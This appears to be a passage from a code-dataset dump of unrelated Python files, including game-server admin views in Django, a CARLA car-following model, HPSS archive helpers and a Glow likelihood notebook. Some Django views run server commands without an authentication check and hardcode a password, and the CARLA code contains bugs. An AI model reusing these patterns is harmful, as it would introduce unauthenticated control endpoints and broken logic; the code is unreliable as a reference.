choose)\n\n","sub_path":"crawler/tb_buy.py","file_name":"tb_buy.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"10008205","text":"from net.grinder.script.Grinder import grinder\nfrom net.grinder.script import Test\nfrom net.grinder.plugin.http import HTTPRequest\nfrom java.lang import System\nfrom java.lang import String\nfrom junit.framework import TestSuite\nfrom junit.framework import TestResult\n\nfrom com.amazon.biw2.webapp.tests import BiwAdpTest\nfrom com.amazon.biw2.webapp.tests import BiwAsinSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwKeywordSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwMediaSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwProductSearchTest\nfrom com.amazon.biw2.webapp.tests import BiwSearchTest\n\n\ndef createTestRunner(script):\n exec(\"x = %s.TestRunner()\" % script)\n return x\n\n\nclass TestRunner:\n def __init__(self):\n tid = grinder.threadID\n self.initialisationTime = System.currentTimeMillis()\n # if tid % 5 == 4:\n # self.testRunner = createTestRunner(scripts[1])\n\n def __call__(self):\n # Turn off automatic reporting for the current worker thread.\n # Having done this, the script can modify or set the statistics\n # before they are sent to the log and the console.\n grinder.statistics.delayReports = 1\n\n tid = grinder.threadID\n\n # Creates a Test Suite.\n if tid % 5 == 4:\n suite = TestSuite(BiwAdpTest().getClass())\n elif tid % 5 == 3:\n suite = TestSuite(BiwAsinSearchTest().getClass())\n elif tid % 5 == 2:\n suite = TestSuite(BiwKeywordSearchTest().getClass())\n elif tid % 5 == 1:\n suite = TestSuite(BiwMediaSearchTest().getClass())\n else:\n suite = TestSuite(BiwProductSearchTest().getClass())\n\n # Returns the tests as an enumeration.\n tests = suite.tests();\n\n # Iterate over the tests.\n testNumber = 0\n for test in tests:\n testNumber += 1\n testCase = Test(testNumber, test.getName()).wrap(suite)\n\n testResult = TestResult()\n testCase.runTest(test, testResult)\n\n if testResult.errorCount() > 0:\n grinder.statistics.success = 0\n elif testResult.failureCount() > 0:\n grinder.statistics.success = 0\n\n def __del__(self):\n elapsed = System.currentTimeMillis() - self.initialisationTime\n","sub_path":"scripts/biw_search.py","file_name":"biw_search.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211886463","text":"#función simple\ndef calcula():\n calculo = 43 * 12 * 80\n calculo = calculo / 7\n coeficiente = 45 * 3.1416\n calculo = calculo * coeficiente\n calculo = \"El resultado es -> \" + str(calculo)\n print(calculo)\n\n# función recibe parámetros\ndef calcula_valor(mensaje, numero1, numero2):\n resultado = numero1 + numero2\n print(mensaje + str(resultado))\n\n\n# función recibe y devuelve parámetros\ndef calcula_valor_2(numero1, numero2, comando):\n if comando==\"-\":\n resultado = numero1 - numero2\n if comando==\"+\":\n resultado = numero1 + numero2\n\n return resultado\n\nres1 = calcula_valor_2(10,100,\"+\")\n\nprint(res1)\n\n\n\n\n\n\n\n\n","sub_path":"1 python_desde_0/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"395812767","text":"from __future__ import print_function, absolute_import\n\nimport os.path\nimport shlex\nimport subprocess\nfrom .settings import get_db_filename, logger\nfrom .utils import run_command\n\n\ndef hpss_transfer(hpss, file_path, transfer_type, cache, keep=None):\n if hpss == 'none':\n logger.info('{}: HPSS is unavailable'.format(transfer_type))\n if transfer_type == 'put' and file_path != get_db_filename(cache):\n logger.info('{}: Keeping tar files locally and removing write permissions'.format(\n transfer_type))\n # https://unix.stackexchange.com/questions/46915/get-the-chmod-numerical-value-for-a-file\n display_mode = \"stat --format '%a' {}\".format(file_path).split()\n output = subprocess.check_output(display_mode).strip()\n logger.info('{} original mode={}'.format(file_path, output))\n # https://www.washington.edu/doit/technology-tips-chmod-overview\n # Remove write-permission from user, group, and others,\n # without changing read or execute permissions for any.\n change_mode = 'chmod ugo-w {}'.format(file_path).split()\n subprocess.check_output(change_mode)\n output = subprocess.check_output(display_mode).strip()\n logger.info('{} new mode={}'.format(file_path, output))\n return\n if transfer_type == 'put':\n transfer_word = 'to'\n transfer_command = 'put'\n elif transfer_type == 'get':\n transfer_word = 'from'\n transfer_command = 'get'\n else:\n raise Exception('Invalid transfer_type={}'.format(transfer_type))\n logger.info('Transferring file {} HPSS: {}'.format(transfer_word, file_path))\n path, name = os.path.split(file_path)\n\n # Need to be in local directory for hsi put to work\n cwd = os.getcwd()\n if path != '':\n if (transfer_type == 'get') and (not os.path.isdir(path)):\n os.makedirs(path)\n os.chdir(path)\n\n # Transfer file using hsi put\n command = 'hsi -q \"cd {}; {} {}\"'.format(hpss, transfer_command, name)\n error_str = 'Transferring file {} HPSS: {}'.format(transfer_word, name)\n run_command(command, error_str)\n\n # Back to original working directory\n if path != '':\n os.chdir(cwd)\n\n if transfer_type == 'put':\n # Remove local file if requested\n if not keep:\n os.remove(file_path)\n\n\ndef hpss_put(hpss, file_path, cache, keep=True):\n \"\"\"\n Put a file to the HPSS archive.\n \"\"\"\n hpss_transfer(hpss, file_path, 'put', cache, keep)\n\n\ndef hpss_get(hpss, file_path, cache):\n \"\"\"\n Get a file from the HPSS archive.\n \"\"\"\n hpss_transfer(hpss, file_path, 'get', cache, False)\n\n\ndef hpss_chgrp(hpss, group, recurse=False):\n \"\"\"\n Change the group of the HPSS archive.\n \"\"\"\n if hpss == 'none':\n logger.info('chgrp: HPSS is unavailable')\n return\n if recurse:\n recurse_str = '-R '\n else:\n recurse_str = ''\n command = 'hsi chgrp {}{} {}'.format(recurse_str, group, hpss)\n error_str = 'Changing group of HPSS archive {} to {}'.format(hpss, group)\n run_command(command, error_str)\n","sub_path":"zstash/hpss.py","file_name":"hpss.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"226754850","text":"import csv\nimport re\n\n# Open specified csv file and read data from file.\n# Warning: when files are updated and their names get changed, you\n# must update the hard coded file name in DataBuilder.py\ndef dict_builder(path=\"\"):\n location = path\n data_dictionary = dict()\n\n with open(path, \"r\") as fin:\n reader = csv.DictReader(fin)\n\n for frow in reader:\n tempdict = dict()\n for cn, values in frow.items():\n if values != \"\":\n tempdict[cn] = values\n row_id = frow[[*frow.keys()][0]]\n if re.match(r\".*Root Table.*\", location, re.IGNORECASE):\n data_dictionary[row_id] = tempdict\n else:\n data_dictionary[row_id.lower()] = tempdict\n\n return data_dictionary","sub_path":"DataHelper.py","file_name":"DataHelper.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"509753002","text":"# -*- coding: utf-8 -*-\r\nfrom UsrError import UsrError\r\n\r\nclass FeldBuilder:\r\n \"\"\"\r\n Baut aus den Informationen in der Eingabedatei\r\n das Spielfeld zusammen. Vorher wurde der Inhalt der Eingabedatei\r\n nicht geprueft, weshalb das jetzt hier ebenfalls passiert.\r\n \"\"\"\r\n def getFeld(self, filename):\r\n try:\r\n # datei oeffnen (mit \"r\" als Parameter um nur zu lesen)\r\n Field = []\r\n f = open(filename, \"r\") \r\n except:\r\n raise UsrError(\"Fehler beim oeffnen der Datei %s\" % (filename,))\r\n\r\n # bei Erfolg\r\n else:\r\n file = []\r\n # Alle Zeilen aus der Datei in die Collection file schreiben.\r\n for line in f:\r\n file.append(line)\r\n\r\n # Die Spielfelddefinition wird initialisiert mit einem leeren String.\r\n FieldDef = \"\"\r\n for line in file:\r\n \r\n # Die erste Zeile in der Datei, die nicht mit \"#\" beginnt,\r\n # sollte die Spielfelddefinition enthalten.\r\n if not line.startswith(\"#\"):\r\n FieldDef = line\r\n \r\n # Folgezeilen werden ignoriert\r\n break\r\n\r\n # Falls es keine Zeile gab, die mit \"#\" anfing oder zwischen den\r\n # Kommentaren und der Definition eine leerzeile gab, wird eine\r\n # Fehlerbehandlung mit entsprechender Message erzeugt.\r\n if FieldDef == \"\":\r\n raise UsrError(\"Keine Startverteilung fuer die Reihen angegeben\")\r\n\r\n # Gab es eine nicht leere Zeile wird versucht, darin die Zahlen zu\r\n # finden, die die Spielfeld-Startbedingungen wiederspiegeln.\r\n for i in range(len(FieldDef)):\r\n \r\n #alle ungeraden sollten ein wert enthalten.\r\n if i % 2 == 0: # die ungeraden Zahlen (faengt bei 0 an)\r\n try:\r\n # Versuch der Umwandlung des Zeichens in eine Zahl\r\n Field.append(int(FieldDef[i]))\r\n except:\r\n raise UsrError(\"Eingabefehler in der Datei %s in Zeile '%s' \\n\" % (filename, FieldDef,) +\r\n \"%s ist keine Ganzzahl\" % (FieldDef[i],)\r\n )\r\n # ist eine Null angegeben, ist die Startbedingung ungueltig\r\n if FieldDef[i] == \"0\":\r\n raise UsrError(\"Es duerfen keine Startreihen mit dem Wert '0' uebergeben werden!\")\r\n\r\n # geradzahlige Zeichen in der Kette sollen Leerzeichen sein.\r\n if i % 2 == 1: # die geraden Zahlen\r\n if FieldDef[i] != \" \":\r\n raise UsrError(\"Eingabefehler in der Datei %s in Zeile '%s'\" % (filename, FieldDef,))\r\n \r\n # wurden mehr als 9 Reihen angelegt ist die Felddefinition ebenfalls\r\n # ungueltig laut Aufgabenstellung\r\n if len(Field) > 9:\r\n raise UsrError(\"Es wurden zu viele Reihen angegeben. Maximal 9 Reihen sind erlaubt\")\r\n \r\n else:\r\n # gab es keine Fehler wird das erzeugte Feld zurueckgegeben\r\n return Field\r\n","sub_path":"Quellcode/FeldBuilder.py","file_name":"FeldBuilder.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282708278","text":"from django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext, loader, Context\nfrom django.http import HttpResponse\nfrom django.core.context_processors import csrf\nfrom controller import connect\nimport re\nfrom math import floor\n\n\nclass Server:\n def __init__(self, players=None):\n self.players = players\n\n\nclass Player:\n def __init__(self):\n self.userid = None\n self.username = None\n self.steamid = None\n self.timeconnected = None\n self.ping = 0\n self.loss = 0\n self.state = None\n self.ip = None\n\n\ndef get_players(players):\n\n player_list = []\n bot_list = []\n\n for i in players:\n s = re.search('#[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '\"(?P.+)\"[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)[ ]*',\n i)\n if not s:\n s = re.search('#[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '\"(?P.+)\"[ ]+' +\n '(?P[^ ]+)[ ]+' +\n '(?P[^ ]+)',\n i)\n if s:\n b = Player()\n b.userid = s.group('userid')\n b.name = s.group('name')\n b.state = s.group('state')\n bot_list += [b]\n continue\n\n p = Player()\n p.userid = s.group('userid')\n p.username = s.group('name')\n p.steamid = s.group('uniqueid')\n p.timeconnected = s.group('connected')\n p.ping = s.group('ping')\n p.loss = s.group('loss')\n p.state = s.group('state')\n p.ip = s.group('ip')\n player_list += [p]\n\n return (player_list, bot_list)\n\n\ndef server_status(s):\n server = Server()\n\n lines = connect.command(s, 'status')\n status, player_list = lines.split('# userid', 1)\n server.hostname = re.search('hostname: +(.*)', status).group(1)\n server.version = re.search('version *: +(.*)', status).group(1)\n server.ip_address = re.search('public ip *: +(.*)\\)', status).group(1)\n server.current_map = re.search('map *: +(.*) at', status).group(1)\n server.replay = re.search('replay *: +recording', status)\n players = re.search('players *: +(.*) \\((.*) max\\)', status)\n server.current_players = int(players.group(1))\n server.max_players = int(players.group(2))\n\n server.password = connect.get_variable('sv_password', s)\n\n server.maps = []\n map_names = connect.command(s, 'maps *').split('\\n')\n for i in map_names:\n search = re.search('\\(fs\\) (.*)\\.bsp', i)\n if search:\n server.maps += [search.group(1)]\n\n player_list = player_list.split('\\n')\n\n server.players, server.bots = get_players(player_list[1:])\n\n server.humans = server.current_players - len(server.bots)\n\n line = connect.command(s, 'stats').split('\\n')[1]\n search = re.search(' *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+) *' +\n '(?P[^ ]+)', line)\n\n server.cpu_usage = search.group('CPU')\n server.net_in = search.group('NetIn')\n server.net_out = search.group('NetOut')\n server.uptime = int(search.group('Uptime'))\n server.uptime_h = floor(server.uptime / 60.0)\n server.uptime -= server.uptime_h * 60\n server.uptime_d = int(floor(server.uptime_h / 24.0))\n server.uptime_h -= server.uptime_d * 24\n server.uptime_h = int(server.uptime_h)\n server.uptime = int(server.uptime)\n server.map_changes = search.group('MapChanges')\n server.fps = search.group('FPS')\n server.connects = search.group('Connects')\n\n return server\n\n\ndef changemap(request):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n\n connect.command(s, 'changelevel {0}'.format(request.POST.get('map_choice')))\n\n return redirect('home.views.index')\n\ndef setcash(request, ID='@all'):\n cash = request.POST.get('cash')\n if int(cash) < 100:\n cash = \"100\"\n elif int(cash) > 30000:\n cash = \"30000\"\n s = connect.getConnection()\n connect.command(s, 'sm_setcash \"{0}\" {1}'.format(ID, cash))\n\n return redirect('home.views.index')\n\ndef forceready(request):\n s = connect.getConnection()\n connect.command(s, 'sm_ready @all 1')\n\n return redirect('home.views.index')\n\ndef restart(request):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n connect.command(s, 'exit')\n\n return redirect('home.views.index')\n\n\ndef password_toggle(request, enable=False):\n if not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n\n password = '\"\"'\n if int(enable):\n password = '\"shadow\"'\n\n cmd = 'sv_password {0}'.format(password)\n connect.command(s, cmd)\n return redirect('home.views.index')\n\n\ndef kickbyid(request, ID=None, Reason='Slot Reservation'):\n protected = []\n if ID in protected or not request.user.is_authenticated():\n return None\n\n s = connect.getConnection()\n connect.command(s, 'kickid {0} {1}'.format(ID, Reason))\n\n return redirect('home.views.index')\n\n\ndef serverinfo(request):\n try:\n s = connect.getConnection()\n response = server_status(s)\n except connect.socket.timeout:\n response = None\n\n user = request.user\n\n t = loader.get_template('server.json')\n c = Context({\n 'server': response,\n 'auth': user.is_authenticated()})\n\n c.update(csrf(request))\n\n rendered = ' '.join(t.render(c).replace('\\\\\\n', '').split())\n return HttpResponse(rendered, content_type='application/json')\n\n\n # return render_to_response('server.html', )\n\n\ndef index(request):\n try:\n s = connect.getConnection()\n response = server_status(s)\n except connect.socket.timeout:\n response = None\n except connect.socket.error:\n response = None\n\n user = request.user\n return render_to_response('index.html', {\n 'server': response,\n 'auth': user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef wavebuilder(request):\n return render_to_response('wavebuilder.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef statistics(request):\n return render_to_response('statistics.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n\ndef config(request):\n return render_to_response('config.html', {\n 'auth': request.user.is_authenticated(),\n 'path': request.path},\n context_instance=RequestContext(request))\n","sub_path":"site/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"374405720","text":"# Copyright (c) 2014 Cisco Systems Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo.config import cfg\n\nfrom nova.compute import api as compute\nfrom nova import db\nfrom nova.openstack.common import log as logging\nfrom nova.scheduler.solvers import linearconstraints\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\nCONF.import_opt('default_availability_zone', 'nova.availability_zones')\n\n\nclass AvailabilityZoneConstraint(linearconstraints.BaseLinearConstraint):\n \"\"\"To select only the hosts belonging to an availability zone.\n \"\"\"\n\n def __init__(self, variables, hosts, instance_uuids, request_spec,\n filter_properties):\n self.compute_api = compute.API()\n [self.num_hosts, self.num_instances] = self._get_host_instance_nums(\n hosts, instance_uuids, request_spec)\n\n def _get_host_instance_nums(self, hosts, instance_uuids, request_spec):\n \"\"\"This method calculates number of hosts and instances.\"\"\"\n num_hosts = len(hosts)\n if instance_uuids:\n num_instances = len(instance_uuids)\n else:\n num_instances = request_spec.get('num_instances', 1)\n return [num_hosts, num_instances]\n\n # The linear constraint should be formed as:\n # coeff_matrix * var_matrix' (operator) constant_vector\n # where (operator) is ==, >, >=, <, <=, !=, etc.\n # For convenience, the constant_vector is merged into left-hand-side,\n # thus the right-hand-side is always 0.\n\n def get_coefficient_vectors(self, variables, hosts, instance_uuids,\n request_spec, filter_properties):\n # Coefficients are 0 for hosts in the availability zone, 1 for others\n props = request_spec.get('instance_properties', {})\n availability_zone = props.get('availability_zone')\n\n coefficient_vectors = []\n for host in hosts:\n if availability_zone:\n context = filter_properties['context'].elevated()\n metadata = db.aggregate_metadata_get_by_host(context,\n host.host, key='availability_zone')\n if 'availability_zone' in metadata:\n if availability_zone in metadata['availability_zone']:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([1 for j in range(\n self.num_instances)])\n elif availability_zone == CONF.default_availability_zone:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([1 for j in range(\n self.num_instances)])\n else:\n coefficient_vectors.append([0 for j in range(\n self.num_instances)])\n return coefficient_vectors\n\n def get_variable_vectors(self, variables, hosts, instance_uuids,\n request_spec, filter_properties):\n # The variable_vectors[i,j] denotes the relationship between\n # host[i] and instance[j].\n variable_vectors = [[variables[i][j] for j in range(\n self.num_instances)] for i in range(self.num_hosts)]\n return variable_vectors\n\n def get_operations(self, variables, hosts, instance_uuids, request_spec,\n filter_properties):\n # Operations are '=='.\n operations = [(lambda x: x == 0) for i in range(self.num_hosts)]\n return operations\n","sub_path":"nova/scheduler/solvers/linearconstraints/availability_zone_constraint.py","file_name":"availability_zone_constraint.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95491559","text":"from base_car import Base_Car\nfrom globe_var import Globe_Var\n\nfrom sensor_manage import CollisionSensor\nfrom sensor_manage import IMUSensor\nfrom sensor_manage import LaneInvasionSensor\nfrom sensor_manage import RadarSensor\nfrom sensor_manage import GnssSensor\n\n\nclass Intelligent_Car(Base_Car):\n def __init__(self, vehicle):\n super().__init__(vehicle)\n self.vehicle = vehicle\n self.target_acc = 0\n\n # 各类传感器\n self.collision_sensor = None\n self.lane_invasion_sensor = None\n self.gnss_sensor = None\n self.imu_sensor = None\n self.radar_sensor = None\n self.append_sensors()\n\n self.lane_change_type = None # 控制转向\n\n def append_sensors(self):\n '''加载传感器'''\n self.collision_sensor = CollisionSensor(self.vehicle)\n self.lane_invasion_sensor = LaneInvasionSensor(self.vehicle)\n self.gnss_sensor = GnssSensor(self.vehicle)\n self.imu_sensor = IMUSensor(self.vehicle)\n\n def overall_model(self):\n '''控制车辆驾驶的唯一入口'''\n waypoint = self.get_waypoint()\n lane_id,road_id = waypoint.lane_id,waypoint.road_id\n front_car = self.get_forward_car(road_id,lane_id,self.get_distance_to_road_end())\n\n self.target_acc = self.idm_follow_model(self.get_distance_to_other_car(front_car),self,front_car)\n self.acc_control()\n\n def idm_follow_model(self, distance, back_car, front_car):\n '''IDM跟驰模型,跟车距离,后车,前车'''\n if front_car is None:\n return 0\n\n front_car_length = front_car.length\n # 后车速度\n vb = back_car.get_speed()\n # 前车速度\n vf = front_car.get_speed()\n # 跟车距离\n # 下面是公式转化部分\n ss = 2 + vb * 1.2 + vb * (abs(vb - vf)) / (2 * pow(1.5 * 2, 0.5))\n k = 1\n if ss <= 0:\n k = 0\n acc = 1.5 * (1 - pow(vb / self.iv, 4) -k * pow(ss / (distance - front_car_length), 2))\n\n return acc\n\n def idm_change_left(self):\n waypoint = self.get_waypoint()\n if waypoint.get_left_lane() is None:\n print('已是最左车道,无法变道!') # 待图形化展示\n return False\n\n road_id,lane_id = waypoint.road_id.waypoint.lane_id\n distance = self.get_waypoint_distance()\n distance_backup = distance\n\n # 求得同目标车辆列表\n followList = self.get_follow_list(road_id, lane_id, distance, Globe_Var.IDM_RANGE)\n lfollowList = self.get_follow_list(road_id, lane_id - 1, distance, Globe_Var.IDM_RANGE)\n\n # 按距离排序\n followList.sort(key=lambda x: x[1])\n lfollowList.sort(key=lambda x: x[1])\n\n FVC, FV, PFVC, PFV = 0, 0, 0, 0\n\n vehicle, distance = followList[0]\n FVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n for i in range(1, len(followList)):\n vehicle, distance = followList[i]\n front_car, fdistance = followList[i - 1]\n FVC += self.idm_follow_model(distance - fdistance, vehicle,front_car)\n\n vehicle, distance = lfollowList[0]\n PFVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n\n for i in range(1, len(lfollowList)):\n vehicle, distance = lfollowList[i]\n front_car, fdistance = lfollowList[i - 1]\n PFVC += self.idm_follow_model(distance - fdistance, vehicle,\n front_car)\n for i in range(len(followList)):\n vehicle, distance = followList[i]\n FV += self.get_accelerometer()\n for i in range(len(lfollowList)):\n vehicle, distance = lfollowList[i]\n PFV += self.get_accelerometer()\n\n asv = self.vehicle.get_acceleration()\n pasv = self.idm_follow_model(distance_backup, self.vehicle,self.get_forward_vehicle(road_id, lane_id, distance_backup))\n\n # 下面是公式转化部分\n usv = pasv - asv + 0.1 * (FVC - FV + PFVC - PFV)\n if pasv < -2 or PFVC < -2:\n self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n print('向左变道失败!')\n return False\n\n if usv <= 0.3:\n self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n print('向左变道失败!')\n return False\n\n self.lane_change = 'left'\n self.change_lane(self.lane_change)\n print('向左变道成功!')\n return True\n\n def idm_change_right(self):\n waypoint = self.get_waypoint(self.vehicle)\n if waypoint.get_right_lane() is None:\n print('已是最右车道,无法变道!') # 待图形化展示\n return False\n\n road_id = waypoint.road_id\n lane_id = waypoint.lane_id\n distance = self.get_waypoint_distance()\n distance_backup = distance\n\n # 求得同目标车辆列表\n followList = self.get_follow_list(road_id, lane_id, distance, 300)\n lfollowList = self.get_follow_list(road_id, lane_id + 1, distance, 300)\n\n # 按距离排序\n followList.sort(key=lambda x: x[1])\n lfollowList.sort(key=lambda x: x[1])\n\n FVC, FV, PFVC, PFV = 0, 0, 0, 0\n\n vehicle, distance = followList[0]\n FVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n for i in range(1, len(followList)):\n vehicle, distance = followList[i]\n front_car, fdistance = followList[i - 1]\n FVC += self.idm_follow_model(distance - fdistance, vehicle,front_car)\n\n vehicle, distance = lfollowList[0]\n PFVC += self.idm_follow_model(distance, vehicle, self.vehicle)\n\n for i in range(1, len(lfollowList)):\n vehicle, distance = lfollowList[i]\n front_car, fdistance = lfollowList[i - 1]\n PFVC += self.idm_follow_model(distance - fdistance, vehicle, front_car)\n\n for i in range(len(followList)):\n vehicle, distance = followList[i]\n FV += self.get_accelerometer()\n\n for i in range(len(lfollowList)):\n vehicle, distance = lfollowList[i]\n PFV += self.get_accelerometer()\n\n asv = self.vehicle.get_acceleration()\n pasv = self.idm_follow_model(distance_backup, self.vehicle,self.get_forward_vehicle(road_id, lane_id, distance_backup))\n\n # 下面是公式转化部分\n usv = pasv - asv + 0.1 * (FVC - FV + PFVC - PFV)\n if pasv < -2 or PFVC < -2:\n self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n print('向右变道失败!')\n return False\n\n if usv <= 0.3:\n self.idm_follow_model(self.get_waypoint_distance(followList[0][0]),followList[0][0], self.vehicle)\n print('向右变道失败!')\n return False\n\n self.lane_change = 'right'\n self.change_lane(self.lane_change)\n print('向右变道成功!')\n\n return True\n","sub_path":"intelligent_car.py","file_name":"intelligent_car.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"140750139","text":"import json\nimport ipdb\nimport torch\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nfrom datasets import get_CIFAR10, get_SVHN,get_CIFAR100\nfrom model import Glow\nimport sklearn.metrics\nimport numpy as np\n\ndevice = torch.device(\"cuda\")\n\noutput_folder = 'glow/'\nmodel_name = 'glow_affine_coupling.pt'\n\nwith open(output_folder + 'hparams.json') as json_file: \n hparams = json.load(json_file)\n \nprint(hparams)\nhparams['dataroot'] = '../mutual-information'\n\nimage_shape, num_classes, _, test_cifar = get_SVHN(hparams['augment'], hparams['dataroot'], hparams['download'])\n# image_shape, num_classes, _, test_cifar = get_CIFAR10(hparams['augment'], hparams['dataroot'], hparams['download'])\nimage_shape, num_classes, _, test_svhn = get_CIFAR100(hparams['augment'], hparams['dataroot'], hparams['download'])\n\nmodel = Glow(image_shape, hparams['hidden_channels'], hparams['K'], hparams['L'], hparams['actnorm_scale'],\n hparams['flow_permutation'], hparams['flow_coupling'], hparams['LU_decomposed'], num_classes,\n hparams['learn_top'], hparams['y_condition'])\n\nmodel.load_state_dict(torch.load(output_folder + model_name))\nmodel.set_actnorm_init()\n\nmodel = model.to(device)\n\nmodel = model.eval()\n\n# dataset = test_cifar\n# dataloader = torch.utils.data.DataLoader(dataset, batch_size=32, num_workers=6)\n# for x,y in dataloader:\n# \tbreak\n\n# x = x.to(device)\n# y = y.to(device)\n\n# with torch.no_grad():\n# \tzs, nll, logits = model(x, y_onehot=y)\n\n# with torch.no_grad():\n# \trecon = model(z=zs, reverse=True)\n# ipdb.set_trace()\n\n\ndef compute_nll(dataset, model):\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=512, num_workers=6)\n \n nlls = []\n for x,y in dataloader:\n x = x.to(device)\n \n if hparams['y_condition']:\n y = y.to(device)\n else:\n y = None\n \n with torch.no_grad():\n # _, nll, _ = model(x)\n _, nll, _ = model(x, y_onehot=y)\n nlls.append(nll)\n \n return torch.cat(nlls).cpu()\n\n\ncifar_nll = compute_nll(test_cifar, model)\nsvhn_nll = compute_nll(test_svhn, model)\n\nprint(\"CIFAR NLL\", torch.mean(cifar_nll))\nprint(\"SVHN NLL\", torch.mean(svhn_nll))\nipdb.set_trace()\nscores = np.concatenate([cifar_nll[:10000], svhn_nll][:10000])\nlabels = np.concatenate([np.ones_like(cifar_nll)[:10000], np.zeros_like(svhn_nll)[:10000]])\nscore = sklearn.metrics.roc_auc_score(labels, scores)\n\nplt.figure()\nplt.title(\"Histogram Glow - trained on CIFAR10\")\nplt.xlabel(\"Negative bits per dimension\")\nplt.hist(-svhn_nll.numpy(), label=\"CIFAR100\", density=True, bins=30, alpha=.5)\nplt.hist(-cifar_nll.numpy(), label=\"CIFAR10\", density=True, bins=50, alpha=.5)\nplt.legend()\nplt.savefig('svhn.png')\n\n","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319677836","text":"# Copyright 2018-2020 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nQuantum tape that implements reversible backpropagation.\r\n\"\"\"\r\n# pylint: disable=attribute-defined-outside-init,protected-access\r\nfrom copy import copy\r\nfrom functools import reduce\r\nfrom string import ascii_letters as ABC\r\n\r\nimport numpy as np\r\n\r\nimport pennylane as qml\r\n\r\nfrom .jacobian_tape import JacobianTape\r\nfrom .tape import QuantumTape\r\n\r\n\r\nABC_ARRAY = np.array(list(ABC))\r\n\r\n\r\nclass ReversibleTape(JacobianTape):\r\n r\"\"\"Quantum tape for computing gradients via reversible analytic differentiation.\r\n\r\n .. note::\r\n\r\n The reversible analytic differentation method has the following restrictions:\r\n\r\n * As it requires knowledge of the statevector, only statevector simulator devices can be used.\r\n\r\n * Differentiation is only supported for the parametrized quantum operations\r\n :class:`~.RX`, :class:`~.RY`, :class:`~.RZ`, and :class:`~.Rot`.\r\n\r\n This class extends the :class:`~.jacobian` method of the quantum tape to support analytic\r\n gradients of qubit operations using reversible analytic differentiation. This gradient method\r\n returns *exact* gradients, however requires use of a statevector simulator. Simply create\r\n the tape, and then call the Jacobian method:\r\n\r\n >>> tape.jacobian(dev)\r\n\r\n For more details on the quantum tape, please see :class:`~.JacobianTape`.\r\n\r\n **Reversible analytic differentiation**\r\n\r\n Assume a circuit has a gate :math:`G(\\theta)` that we want to differentiate.\r\n Without loss of generality, we can write the circuit 